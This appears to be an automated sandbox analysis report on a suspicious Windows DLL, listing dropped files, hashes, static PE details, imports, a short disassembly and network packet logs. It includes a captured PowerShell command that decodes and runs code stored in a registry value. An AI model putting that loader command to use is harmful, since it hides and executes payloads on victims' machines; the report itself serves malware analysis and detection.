SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF285CDD8A9FD9EA09.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	356174
Entropy (8bit):	3.3387859066382988
Encrypted:	false
SSDEEP:	3072:wKNyZ/2BfcYmu5kLTzGtHZ/2Bfc/mu5kLTzGtYZ/2BfcYmu5kLTzGtoZ/2Bfc/ms:7L2sJ
MD5:	D9784B1EC489A53A9B88EB8E618D2F01
SHA1:	5BF820E64F02D828DE55BA09401E28C3F023564E
SHA-256:	99A6FB5BD4091420EA0E239C32968DF31CBF9D4EDE9D70D092110E4554F6D815
SHA-512:	7647190CE4C2F25CDE1D4D0716EC00526C403C9B0FDDB46BE316F1DE874DA23B54BC16C6BB4687F5CC0DB6E0084B34D2BCC79C6E270B90C3DE6929FF25727321
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9CDA0495EAAA6AA0.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40185
Entropy (8bit):	0.6782854656221494
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+4+UlujA0XoVQM4qLA0XoVQM4qkA0XoVQM4qh:kBqoxKAuqR+4+UlujhqxLhqxkhqxh
MD5:	4B8FE7534F968605956B74CAF0FE9704
SHA1:	551B09C12BB7D866A908378F6415E439B48BBF40
SHA-256:	458BC2C3A1ED86613D63FD225610DBEBFB8FEFF1B921853688DC4DD29A760E7F
SHA-512:	35B9916DAAE721DADABD113FDBF2699F3C676DEBB85C6B7359DA3F61DC804FC1E250E59CF3DF48E5C26F10EA082F3F41FBC8C260EF5E14369D041CBB468CFCFA
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC2D8801B5FD4FCE7.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40177
Entropy (8bit):	0.6752981959949267
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+FEFiFIFZFCFbX7xiruX7xirNX7xir+:kBqoxKAuqR+uoCLYtdFdSdv
MD5:	23D25A4E87883F05A93E4024BC4D6C3A
SHA1:	A7E3789628459F177492E716A75B88A1948DC48B
SHA-256:	64AAFA0C507A32285C7163E3883262DA6C06CC4CB7C27C4C62052B41E056CCC7
SHA-512:	5F4205B23F24B150E5ECD7FE7E1D155480C82CA174A3055D8E5A25CDF1011AB669C0CB9E976129E8C37897AB37520C639E9D2F86DC8B002281442FC8E6F8FB70
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCD0A6692DB1F6E05.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40193
Entropy (8bit):	0.675716949079353
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+NTRwzAfDQQC67tqfDQQC67tzDQQC67tc:kBqoxKAuqR+NTRwzCDQ6uDQ61DQ6W
MD5:	E72A559FF7BA8DF426BDC5FB7BBE9F28
SHA1:	16EF4FF28571CA78C86299D13A8BEB50F6A4AE85
SHA-256:	F0DA35BD880F831F4408D5C8F683513A7B2E9E20011149453C1AD227001B5CC4
SHA-512:	17FDA3F9D8DEBA74B7F285A1F0EA2D224D3DD27417CC361BB193FC80185B2DBD950121B4CB4B3F1F8BDF24DAB7595FE9364D393B7700DCD2497B6C1161363E4A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD1DF0FD1C3CEAF12.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13877
Entropy (8bit):	0.932969513891841
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo09loE9lW2YbM6YYrIlTtMYBV2:kBqoI/J2YbM6LEJtMYBV2
MD5:	E142FC1EDE027006ED8A6BAB62771758
SHA1:	49D25C9BB9B5C84CB46C91FECDE3EF69D127584A
SHA-256:	F111CF5BC35B5B8832FFA30B38779EA09CA8424AD8C66B6EF558A856D7F46389
SHA-512:	F5AEF2EFBB65753B997CEA0C82A5DC62DDF80A8ABDBBD98B216C72DEF285410A04D54C77E38FF740A07C01C3DF77514F348C9C96CA0E0C5B918244B81E0F53C5
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ICP3AR65KZ21I1DQ2Z5.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.174865986811429
Encrypted:	false
SSDEEP:	48:Hb2diOPWXIGC9GrIo4AsASFKb2diOPWXIGh683GrIo4Aczbb2diOPWXIGx9GrIoH:4PWXc9SYAJ2PWXd3SYALPWXL9SYAf
MD5:	8D11F05715F26EAABA0B5A8F5E0D0D6C
SHA1:	370EFEBC66A9AD4766C1AFA9B2F3EFCA8856E95C
SHA-256:	6E81EE6EE07120EF179694A606249A691D2FB50438BB10D56DC5A19015849873
SHA-512:	10B7EF5691559552BCD6DEBF7FDBB36B206609D2DF2434DCA446FB294850F3C510BA735BAF46E4FF82EB19CA0653BAF6C95B498F0E7F7DA29C695AD6E091DA9F
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>......8$.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.u..PROGRA~1..t......L.PRQ+....E...............J.....o@-.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.PRB+..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JPRB+.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........P........C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6} Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.0588651812039735
Encrypted:	false
SSDEEP:	3:JoXIFTHVFXVR3AQEHlTEHFZF3:UIFL42HF73
MD5:	EF670621A9E40D4C16F6E8FD8F4A92D6
SHA1:	5D0B314D2BFA423E8831C063C70B3481A65695E5
SHA-256:	C46103D30628753D940B8BF4C7B993590EE9484AAC58CF5A549351408C134C6D
SHA-512:	CA232C14749470AD21950EFDE2932E518186F2134A730C5A422373E458E3B31D10DEE780FE0704E6EA050522E5DD45D9BA15217F75EBAD500313D25AFC43B2F2
Malicious:	false
Preview:	15-02-2021 21:27:52 \| "0xb204e7e0_6005be7372c1a" \| 4306..

C:\Users\user\Documents\20210215\PowerShell_transcript.965543.+w5YM+DY.20210215212700.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1191
Entropy (8bit):	5.297361389340788
Encrypted:	false
SSDEEP:	24:BxSA0DvBB7ax2DOXUWOLCHGIYBtLW2HjeTKKjX4CIym1ZJXaOLCHGIYBtwnxSAZx:BZQv/WoORF/2qDYB1ZgFjZZx
MD5:	FDC6B05B87F775E5D10E1508743790FC
SHA1:	5E4D95C2C7331CC8732ABAC8FA9BB4B5B056D662
SHA-256:	6835727E636A5A63A3B1536D02E585ECB93168DFBFAA7DF54D353E7D5C5CABF1
SHA-512:	952C34840B36B1E8DA199910B6EA3F782F0992F4FBCC66A8F57DE1D99E884F9E3F76FE02CE705F4BD18E5540E9C346A87E0B4518401222CDA45844609D4C366F
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210215212701..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 965543 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210215212701..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..********************

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.790725842982734
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NJPcHPuRcG.dll
File size:	360448
MD5:	48ac334e786156ef605b82dd563373f4
SHA1:	1710cf3539eaaf618a613e690157adf30550fade
SHA256:	71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
SHA512:	e32f9f05ede3025e108f307f6c76bd95b00dadb64e5cc45e78793e8bf97c929ba26802f7bff8d27b570459df695f4e3e67cd2e6b7563055cdc895530d7ce557c
SSDEEP:	6144:+87Sm49lFRQSAe5klIQm3n/ym1grjpY7nf9fv3lYdkv+hgG2KnG4r/gU:Wm+3QSAdm3n/yogZgJv3Gqv0gG2uG4jv
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.6.&.X.&.X.&.X..F%.>.X..F6...X..F5...X./...#.X.&.Y.I.X..F*.'.X..F".'.X..F$.'.X..F .'.X.Rich&.X.........PE..L....Z.E...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x100285d5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x45C55A8A [Sun Feb 4 04:01:14 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e0e710d4ed87ec11636d345dba071187

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007FDAE4A29AF7h
call 00007FDAE4A328A0h
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007FDAE4A299E2h
pop ecx
retn 000Ch
mov eax, dword ptr [esp+04h]
xor ecx, ecx
cmp eax, dword ptr [100503A0h+ecx*8]
je 00007FDAE4A29B04h
inc ecx
cmp ecx, 2Dh
jl 00007FDAE4A29AE3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FDAE4A29AFEh
push 0000000Dh
pop eax
ret
mov eax, dword ptr [100503A4h+ecx*8]
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
ret
call 00007FDAE4A302E8h
test eax, eax
jne 00007FDAE4A29AF8h
mov eax, 10050508h
ret
add eax, 08h
ret
call 00007FDAE4A302D5h
test eax, eax
jne 00007FDAE4A29AF8h
mov eax, 1005050Ch
ret
add eax, 0Ch
ret
push esi
call 00007FDAE4A29ADCh
mov ecx, dword ptr [esp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FDAE4A29A82h
pop ecx
mov esi, eax
call 00007FDAE4A29AB5h
mov dword ptr [eax], esi
pop esi
ret
push ebp
mov ebp, esp
sub esp, 48h
mov eax, dword ptr [10050514h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
cmp dword ptr [esi+14h], ebx
push edi
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-28h], ebx

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4f020	0x93	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4e754	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb1000	0x4d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb2000	0x1c98	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3e220	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4cc28	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3e000	0x1b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3c44c	0x3d000	False	0.709152471824	data	6.87914884899	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3e000	0x110b3	0x12000	False	0.671671549479	data	6.38365470065	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x50000	0x604c8	0x4000	False	0.558715820312	COM executable for DOS	5.48871661926	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xb1000	0x4d0	0x1000	False	0.150146484375	data	1.65729733757	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb2000	0x2c74	0x3000	False	0.485595703125	data	4.83368153083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xb10a0	0x2b0	data	English	United States
RT_MANIFEST	0xb1350	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

ExitProcess, GetFileAttributesA, CreateProcessA, GetSystemDirectoryA, GetEnvironmentVariableA, MultiByteToWideChar, GetShortPathNameA, CopyFileA, GetTempFileNameA, LoadLibraryA, WaitForMultipleObjects, GetModuleFileNameA, VirtualProtect, GetCurrentProcessId, CompareStringW, CompareStringA, CreateFileA, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, ReadFile, GetLocaleInfoW, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetTimeFormatA, GetDateFormatA, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCommandLineA, GetVersionExA, HeapAlloc, GetProcessHeap, GetCPInfo, RaiseException, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, GetProcAddress, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP, GetTimeZoneInformation, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, HeapSize, GetUserDefaultLCID, SetEnvironmentVariableA

WS2_32.dll

ioctlsocket, inet_ntoa, WSAStartup, recvfrom, ntohl, inet_addr, htons, WSACleanup, recv, socket, getservbyname, send, getsockopt, listen

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10021230
Exactnature	2	0x10021130
Happenthousand	3	0x100215a0
Probablepath	4	0x10021650

Version Infos

Description	Data
LegalCopyright	Copyright Strongimagine 1996-2016
FileVersion	8.3.8.121
CompanyName	Strongimagine
ProductName	Room know
ProductVersion	8.3.8.121 Soundbank
FileDescription	Room know
OriginalFilename	Sing.dll
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2021 21:26:09.578371048 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.593199968 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.624738932 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.624855042 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.640058994 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.640161037 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.794764042 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.794965029 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.841253996 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.841444016 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.842334032 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.842351913 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.842406034 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.842427015 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.843575954 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.843595028 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.843664885 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.872016907 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.876569033 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.878782988 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.878918886 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.878942013 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.918380976 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.919944048 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.919959068 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.920032978 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.923110008 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.923415899 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.923489094 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.923523903 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.923546076 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.925079107 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.925096989 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.925416946 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.926136971 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.926214933 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.929445982 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.929541111 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.940157890 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.941159010 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:09.993835926 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.993861914 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:09.994421005 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:26:10.028172970 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:26:16.535990953 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.537506104 CET	49747	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.538933039 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.540324926 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.559175968 CET	49750	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.561006069 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.579588890 CET	443	49746	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.579718113 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.581003904 CET	443	49747	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.581119061 CET	49747	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.582297087 CET	443	49748	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.582405090 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.583616018 CET	443	49749	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.583719015 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.587002039 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.602608919 CET	443	49750	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.602838993 CET	49750	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.604298115 CET	443	49751	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.604506016 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.630336046 CET	443	49749	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.631983995 CET	443	49749	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.632019043 CET	443	49749	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.632045031 CET	443	49749	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.632177114 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.632210016 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.702423096 CET	49747	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.745954990 CET	443	49747	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.747209072 CET	443	49747	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.747251034 CET	443	49747	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.747270107 CET	443	49747	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.747335911 CET	49747	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.747360945 CET	49747	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.911320925 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.912391901 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.958448887 CET	443	49751	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.958827019 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.959568977 CET	443	49746	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.959602118 CET	443	49751	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.959630966 CET	443	49751	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.959656000 CET	443	49751	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.959656000 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.959676981 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.959707022 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.960531950 CET	443	49746	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.960562944 CET	443	49746	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.960617065 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.960625887 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:16.960663080 CET	443	49746	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:16.960710049 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.002389908 CET	443	49748	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:17.004060030 CET	443	49748	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:17.004103899 CET	443	49748	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:17.004138947 CET	443	49748	151.101.1.44	192.168.2.5
Feb 15, 2021 21:26:17.004247904 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.004285097 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.023570061 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.028228045 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.035218954 CET	49750	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.035350084 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.035563946 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.035686970 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.035801888 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.035914898 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.036021948 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.036129951 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.036238909 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.036350965 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.036465883 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.036544085 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.038512945 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:26:17.039038897 CET	49746	443	192.168.2.5	151.101.1.44
